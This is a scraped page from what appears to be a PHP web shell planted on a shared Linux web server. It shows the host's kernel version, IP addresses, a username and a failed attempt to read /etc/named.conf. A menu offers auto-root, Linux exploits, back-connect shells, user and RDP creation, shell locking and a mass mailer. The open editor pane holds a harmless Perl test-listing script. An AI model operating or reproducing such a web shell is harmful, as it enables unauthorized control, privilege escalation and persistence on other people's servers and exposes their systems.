Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Test /
[ HOME SHELL ]
Name
Size
Permission
Action
Unit
[ DIR ]
drwxr-xr-x
MockTime.pm
6.49
KB
-rw-r--r--
Requires.pm
3.6
KB
-rw-r--r--
Specio.pm
40.37
KB
-rw-r--r--
TestLister.pl
498
B
-rwxr-xr-x
TypeTiny.pm
7.09
KB
-rw-r--r--
Unit.pm
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TestLister.pl
#!/usr/bin/perl -w use strict; use Getopt::Long; use Test::Unit::Loader; my %opts = (); GetOptions(\%opts, 'help', 'testcases'); usage() if $opts{help}; foreach my $test (@ARGV) { my $suite = Test::Unit::Loader::load($test); print join '', @{ $suite->list($opts{testcases}) }; } sub usage { die <<EOF; Usage: $0 [ OPTIONS ] <TEST> [ <TEST> ... ] Options: --testcases, -t List testcases contained in (sub)suites --help, -h Tests can be package names or file names. EOF }
Close